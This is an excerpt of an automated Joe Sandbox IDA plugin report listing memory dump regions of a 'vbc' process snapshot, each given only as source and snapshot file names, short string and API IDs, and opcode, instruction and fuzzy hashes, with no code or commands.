                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: MUI
                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                  • Opcode ID: ac14340a767e62c4b2f01201a0966dec84542575b3f6e2868a18bcc0c0a98fe7
                                                                                                                                                  • Instruction ID: 455f8ef03cf43dbd8ea9a8417268be9f37189b3209cbed11aa55b99fae9c92cf
                                                                                                                                                  • Opcode Fuzzy Hash: ac14340a767e62c4b2f01201a0966dec84542575b3f6e2868a18bcc0c0a98fe7
                                                                                                                                                  • Instruction Fuzzy Hash: 39825C75E052189BDB24DFA9C984FADB7B2FF48310F14896AD81AAB360D7709E41CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PATH
                                                                                                                                                  • API String ID: 0-1036084923
                                                                                                                                                  • Opcode ID: e922c1f47077471dd8accaacf2a40762ad467265db2deaecd4d89f692bc83302
                                                                                                                                                  • Instruction ID: b369a1d5e298229c9129ea23d4166226ed68e049333fadfe18b21677ff99cf8d
                                                                                                                                                  • Opcode Fuzzy Hash: e922c1f47077471dd8accaacf2a40762ad467265db2deaecd4d89f692bc83302
                                                                                                                                                  • Instruction Fuzzy Hash: B0F18071E142549BCB25DF9DD881EBEBBB1FF88B10F54486AE841AB340DB349981CF90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: w
                                                                                                                                                  • API String ID: 0-476252946
                                                                                                                                                  • Opcode ID: 827116d927a1fc28ca579c54d9df50ee2514c1470d16ba009f0d9d71e1d7607a
                                                                                                                                                  • Instruction ID: 10ba78e37a1c6cada8b468741cc0c9de15e380488a63496238fdb095c125b036
                                                                                                                                                  • Opcode Fuzzy Hash: 827116d927a1fc28ca579c54d9df50ee2514c1470d16ba009f0d9d71e1d7607a
                                                                                                                                                  • Instruction Fuzzy Hash: 2AD1C070904219ABCB24CF55C481ABFFBB2FF84704F148859E99AD7641E335ED92D7A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                                                                  • Instruction ID: ce13020c19cb1a956ccbc2a3858375214fff23ba764edcaba0baef3052c52938
                                                                                                                                                  • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                                                                  • Instruction Fuzzy Hash: F2A13E75E05209AFDF19DFA8C8C0EBEB7B9FF58744F144829E911A7250E7749A40CB50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: e4bacbc02c46da18c9ea41489ff5e9f916301acb46c37f5debed4e7cebc40abf
                                                                                                                                                  • Instruction ID: 3d917a2e94c09458b561c94d37731287b12cc13347efad0f8ee261bacb2d643b
                                                                                                                                                  • Opcode Fuzzy Hash: e4bacbc02c46da18c9ea41489ff5e9f916301acb46c37f5debed4e7cebc40abf
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9dfc6df2739d1d9be7c23efae838761a2e191b60ddfcbdda6213ab166980e7e9
                                                                                                                                                  • Instruction ID: 5b43344ad5bd1581d39ecfd001e7ed6ac7b82024fd994453d65466cce4da9d31
                                                                                                                                                  • Opcode Fuzzy Hash: 9dfc6df2739d1d9be7c23efae838761a2e191b60ddfcbdda6213ab166980e7e9
                                                                                                                                                  • Instruction Fuzzy Hash: DAE15B716083418FC714CF28C490E6ABBE1BF8A318F158E6DE9958B355DB31EA85CF91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bb3cf6124d819e5f04194c815c3a6ec1f16de6483e964c54ace5762dcf31e19f
                                                                                                                                                  • Instruction ID: 3423e0045cdff495db0eb99ea83c88e6cdd0a24d9bed8aae3dc6b8a3be1bd5a8
                                                                                                                                                  • Opcode Fuzzy Hash: bb3cf6124d819e5f04194c815c3a6ec1f16de6483e964c54ace5762dcf31e19f
                                                                                                                                                  • Instruction Fuzzy Hash: FED1C57170520AABCF18DF65C896EBA77B6FF44308F044929F956DB280E734EA45CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e552200edcca0e7f1ce35b6b7605bd7bece5418db7627ce568e8ead6f428b89c
                                                                                                                                                  • Instruction ID: 2a6b38e5d731af70bf5963ea2b6826f39974da6a7ab4a9906e45b5bbead2475b
                                                                                                                                                  • Opcode Fuzzy Hash: e552200edcca0e7f1ce35b6b7605bd7bece5418db7627ce568e8ead6f428b89c
                                                                                                                                                  • Instruction Fuzzy Hash: D4E10375E04608DFCB25CFA9D984AADBBF2FF48314F14492EE946A7264D770AA41CF10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                  • Instruction ID: 22b4da857a97d15187b477a2912a5285bc5cdb780c9ecbfcdf6b99cab5109974
                                                                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                  • Instruction Fuzzy Hash: C6B15174B00608AFDF24DB95C944EABBBBAFF84304F14589EE94397790DA34EA45DB10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                  • Instruction ID: 98699b285af5844a70201109e8fdd81555c61f899a176bf5e6fc189914df68b3
                                                                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                  • Instruction Fuzzy Hash: 72B12632704646AFDB15CBA4C888BBEBBF6BF44314F144D58D942E7281DB70DA81DB94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8414e939331b54ecf330039c411ec1498719064a5af810d6ca0e3203dfae7b04
                                                                                                                                                  • Instruction ID: feaf5e3dee5b214fcc4d33465c27134a6f339d26b5f0cb4bfb05c1a997e32820
                                                                                                                                                  • Opcode Fuzzy Hash: 8414e939331b54ecf330039c411ec1498719064a5af810d6ca0e3203dfae7b04
                                                                                                                                                  • Instruction Fuzzy Hash: A4C14D75E0425ADFDB15CFD9C888AADBBB6FF48344F10492AE405BB355E770AA81CB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3de906fc6f87bd2e769be28f281601fdd26f2276e2d87c9ace03ea72635d7080
                                                                                                                                                  • Instruction ID: 5e780638b6eeaee3169f1c28c4ce34064cc9fa124fbd51997d8ffa7008a9cfb9
                                                                                                                                                  • Opcode Fuzzy Hash: 3de906fc6f87bd2e769be28f281601fdd26f2276e2d87c9ace03ea72635d7080
                                                                                                                                                  • Instruction Fuzzy Hash: 45C159756083818FE764CF15C494BAABBE5FF88708F444D6DE98A87290D774EA04CF92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 821a44908d52becc38f521c7600c08e7f28210cf4d4fe49d02ebcb2c600a4671
                                                                                                                                                  • Instruction ID: 76caedd44c3e34ffa3afc3778faddc0c4e1b26437c05f9cf936089bddd6bad25
                                                                                                                                                  • Opcode Fuzzy Hash: 821a44908d52becc38f521c7600c08e7f28210cf4d4fe49d02ebcb2c600a4671
                                                                                                                                                  • Instruction Fuzzy Hash: 80B16F70B042698BDB64DF65C895BBDB3B2EF44704F1089EAD50AA7240EB70DEC5DB20
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a169011de1897c6bdb85f7806fe2bf6892dd8117845bdee1b44013b6da7e0562
                                                                                                                                                  • Instruction ID: 394116e20bc6c4342c11680972dce466c1c2e803b573fd122f54d8c1bc8a5b2f
                                                                                                                                                  • Opcode Fuzzy Hash: a169011de1897c6bdb85f7806fe2bf6892dd8117845bdee1b44013b6da7e0562
                                                                                                                                                  • Instruction Fuzzy Hash: 2FA13C3AE042599FEB21DB59D888FBE7FB9BF00718F050916E901AB290D7749F40C795
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 25d10230da21cb86749f75200b57267fd413a4f6a69581e9e3a4d4380be760c9
                                                                                                                                                  • Instruction ID: d59ed0d13c01a1267d59d4a363bbccd67d2e2da49c9e19f870577a10d3b2ccc3
                                                                                                                                                  • Opcode Fuzzy Hash: 25d10230da21cb86749f75200b57267fd413a4f6a69581e9e3a4d4380be760c9
                                                                                                                                                  • Instruction Fuzzy Hash: 2FA1E470B01615DFEB24EF65C898BBAB7B6FF44318F044829EA05A7381EB74E905DB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 623740886f58256a3f2acf3b8705029337e16e147d8417b025b7a659c5bfa404
                                                                                                                                                  • Instruction ID: 89ca4b51956c1d4a343fce56e60827cdea1650517072ad55946df9f410e597b1
                                                                                                                                                  • Opcode Fuzzy Hash: 623740886f58256a3f2acf3b8705029337e16e147d8417b025b7a659c5bfa404
                                                                                                                                                  • Instruction Fuzzy Hash: 15A1FD72A04241EFCB11DF58D980F6AB7EAFF48754F44092AF9899B250C734EC41CB99
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ce51e2db361e7819f7687a40b1f05d726682a89552f83086631c8fb39f79281b
                                                                                                                                                  • Instruction ID: 4300e919df5b5b9938b99486d48bbe8c0813656bded9ff94184081952daa9a29
                                                                                                                                                  • Opcode Fuzzy Hash: ce51e2db361e7819f7687a40b1f05d726682a89552f83086631c8fb39f79281b
                                                                                                                                                  • Instruction Fuzzy Hash: 1D91C171E04215AFCF15CFACD984BAEBFB5AF48710F1549ADE501AB341D734EA809BA0
                                                                                                                                                  Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6b2e843ff9acdfb266393f39d9ebe64159260dd02a6dbf97d6a9af24403c4bf
• Instruction ID: 9222e01c493b6cbc08bbab162f9681a7703ac9c3dcfc1f2e19d3d8b97b91f455
• Opcode Fuzzy Hash: d6b2e843ff9acdfb266393f39d9ebe64159260dd02a6dbf97d6a9af24403c4bf
• Instruction Fuzzy Hash: 56914532B00616DBD725DBA9C485B7E7BA6FF84724F0448A6EC069B340E734DB81C7A5
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e8577d998afdc3b97acb41de1022001c30d29e54a9f64d9b4b87f0b09bf6145
• Instruction ID: bdcdcc9b101983792e2714be4cf3f8f5e16907a187b6ab0ddd37946eba1925f1
• Opcode Fuzzy Hash: 2e8577d998afdc3b97acb41de1022001c30d29e54a9f64d9b4b87f0b09bf6145
• Instruction Fuzzy Hash: B27190766083429BDF28CF15C988A7AB7E9FB84650F044D2DF956D7200E734EA84CBD2
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03e1d488c85371f6383d1cde48412a3e4d340f1d10539440d5159e472bd3c623
• Instruction ID: 39f99ce2aa0d094fe56ac90922814544b6cec5f5404d06ca9edf5c8c92638ee5
• Opcode Fuzzy Hash: 03e1d488c85371f6383d1cde48412a3e4d340f1d10539440d5159e472bd3c623
• Instruction Fuzzy Hash: A0818E71A00609AFDB25DFA9C884EEEBBFAFF48354F104829E556A7210D770AD45CB60
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 293e87b634e7bbaa798bf3e0a6e0f0d7172a8c4311d2974ac6db1eeea2694552
• Instruction ID: 7b653e19c20ac22a862e5136f3cc25515dfef5d8bcd65b337feac0a6b3c066b1
• Opcode Fuzzy Hash: 293e87b634e7bbaa798bf3e0a6e0f0d7172a8c4311d2974ac6db1eeea2694552
• Instruction Fuzzy Hash: 6B71C175D04266DBCB25CF99D890BBEBFB1FF48714F14491AE842AB350E7389940CBA4
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17da5f8792328d7d57af04f384ea52eb8e6e53061e250d2d031364d799eec936
• Instruction ID: cc312e73f70dcf335f741f230bd74f7a467757a5faa93d265e1ce2787cd95c6d
• Opcode Fuzzy Hash: 17da5f8792328d7d57af04f384ea52eb8e6e53061e250d2d031364d799eec936
• Instruction Fuzzy Hash: A271E274A041669FCB10DF59C840ABEFBF2FF45304F048869E994DB241E338DA45CBA0
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b7aed7de0ddf690f334c873faed859a20a76461661e50268c93d81d37b12e165
• Instruction ID: d9dc5aa161d69d502f93501a8f8999fff7e9b1c0e2193bb81390fd6f304fe0d1
• Opcode Fuzzy Hash: b7aed7de0ddf690f334c873faed859a20a76461661e50268c93d81d37b12e165
• Instruction Fuzzy Hash: D8719E70A18214EFCF54DF99E985AABBBF9FF80310B10495BE601AB354DB71CA40DB64
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4fce631d2448057d63182a1dff7604439dd8670174796cb42fcaa528e5083f30
• Instruction ID: b99a026ad52133e82f8a7bbec7a9d8c16ba7f9cef030bbecdec454ea180c7383
• Opcode Fuzzy Hash: 4fce631d2448057d63182a1dff7604439dd8670174796cb42fcaa528e5083f30
• Instruction Fuzzy Hash: E671E43A7046418FC311DF68C484B2AB7E6FF84324F0589A9EC95CB351DB34D986CB95
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
• Instruction ID: b4163322cfcebbddd50e5c14c53ac4dae0e2446fdeed0739178e1543dbacc442
• Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
• Instruction Fuzzy Hash: 25717E71A00609EFCB10DFA9C988EEEBBB9FF48710F144969E905B7250DB34EA41DB54
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6efa706cf82cd831cbac272fb73053358151ff205cd174deaa301e86a5480e48
• Instruction ID: 886de4cd50a75b04bbfb12eaa51a0abb051e14239d7d0581a2a01dce5f3c58ca
• Opcode Fuzzy Hash: 6efa706cf82cd831cbac272fb73053358151ff205cd174deaa301e86a5480e48
• Instruction Fuzzy Hash: B771DF32200A01AFD722DF58C848F6AF7E6FB40764F154D28E656CB2A0DB75E984DB60
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34f1e2910970af77df1431a87adde8f079655efabedeb3dc218b9d25a3d12f1c
• Instruction ID: 54cafa2496f60036000603a968f49c4174ed7c0027c9a125c2fcc5b73cd8d78d
• Opcode Fuzzy Hash: 34f1e2910970af77df1431a87adde8f079655efabedeb3dc218b9d25a3d12f1c
• Instruction Fuzzy Hash: 586191B1A0020ADFDB18DFA8C895ABEB7B6FF08314F144969E512EB290DB709D41CF54
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
• Instruction ID: 06bb0afa9196332b621e54439f4c9718b9d3ed3634854180fc176af6cb652186
• Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
• Instruction Fuzzy Hash: A8719975644B868BDB368E25CA49B36BBF2BF44BA1F500F2DD8D3029E0D330A941CB40
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23aebf087a2c6c7634f14431446eba4f26b1602c7f5b42f192f2b89b58036006
• Instruction ID: 374d789719ffb321ca8268805c17b8dc65b9672d95b3a4b9c8fdb09bc8e590fc
• Opcode Fuzzy Hash: 23aebf087a2c6c7634f14431446eba4f26b1602c7f5b42f192f2b89b58036006
• Instruction Fuzzy Hash: 8B51A172608712AFD752DE68CC88E6BFBE9EB85754F010D29BA44DB250D730ED04C7A2
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41ee912295070ada9d70c0df7b06333e312ef4835315b8d1da2756474bab03f8
• Instruction ID: 2ba8db29267aacaec194e4981cb3ca204e7200b12d2c658acd471876160410b4
• Opcode Fuzzy Hash: 41ee912295070ada9d70c0df7b06333e312ef4835315b8d1da2756474bab03f8
• Instruction Fuzzy Hash: 7E519E797007459FDB20DB9AC8C8B6BB7EAFB45219F100D2EE00287651D774EA84CB91
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
• Instruction ID: dadf2a15d587305ef928746fb4798fa94ac9a8207fe636c14e8606d1e51c82f6
• Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
• Instruction Fuzzy Hash: 5A519176E0060ADFDB14CF98C5C06EDBBBAFB48208F148969D856B7200D734AE40CB94
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1eccec376d246d26bf29643688c354fd914acbdbc30e287f4d5729f5bd4a38b8
• Instruction ID: 69eef35722ebdd1313f7dd18f4da462bc42e7e3b4fe529842c01c6a8993360a8
• Opcode Fuzzy Hash: 1eccec376d246d26bf29643688c354fd914acbdbc30e287f4d5729f5bd4a38b8
• Instruction Fuzzy Hash: 3751D2716083029FD711DF28C844BAABBE6FF84350F04492EF986972D1D734E908DB96
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bee8e1f6c8e9a68ccaffa00b8ffaf9d3cf53801391853248658ed28f20874a94
                                                                                                                                                  • Instruction ID: b41e5a0535675e6540bbcf5b1f2e3b6b7c6ad5c0c28ec13ababb92c5b8ea49fd
                                                                                                                                                  • Opcode Fuzzy Hash: bee8e1f6c8e9a68ccaffa00b8ffaf9d3cf53801391853248658ed28f20874a94
                                                                                                                                                  • Instruction Fuzzy Hash: 5F51BF70A00704DFD721DF66C884A6BFBF9FF84710F104A1ED192576A0D7B0A985CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ad3afe672c25ba47f3584f08768086b880314b4e26489d2e0b2e13dc737ed5e0
                                                                                                                                                  • Instruction ID: 428e7e89c6e6d6c6b5c96a39f9a3fc010697c62a5f806be79b824c3ac5d0ca05
                                                                                                                                                  • Opcode Fuzzy Hash: ad3afe672c25ba47f3584f08768086b880314b4e26489d2e0b2e13dc737ed5e0
                                                                                                                                                  • Instruction Fuzzy Hash: BD516E72600A48DFDB21EFA5C988EAAB3FDFF04794F500D6AE54297660D734EA40DB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
